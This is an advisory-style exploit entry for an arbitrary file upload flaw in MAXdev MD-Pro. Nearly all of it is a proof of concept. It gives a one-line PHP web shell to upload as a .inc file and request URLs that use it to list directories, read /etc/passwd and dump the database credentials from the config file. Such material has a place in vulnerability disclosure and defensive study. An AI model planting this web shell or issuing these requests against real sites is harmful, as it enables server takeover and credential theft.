• info
• discussion
• exploit
• solution
• references

MAXdev MD-Pro Arbitrary Remote File Upload Vulnerability

No exploit is required.

The following proof of concept is available:
upload a file with .inc extension with this code inside:

<?php
error_reporting(0);
system($_GET[c]);
?>

now list directories with:
http://www.example.com/upload/dl/[filename].inc?c=ls%20-la

see /etc/passwd file:
http://www.example.com/upload/dl/[filename].inc?c=cat%20/etc/passwd

see database username and password:
http://www.example.com/upload/dl/[filename].inc?c=cat%20.././config/md-config.php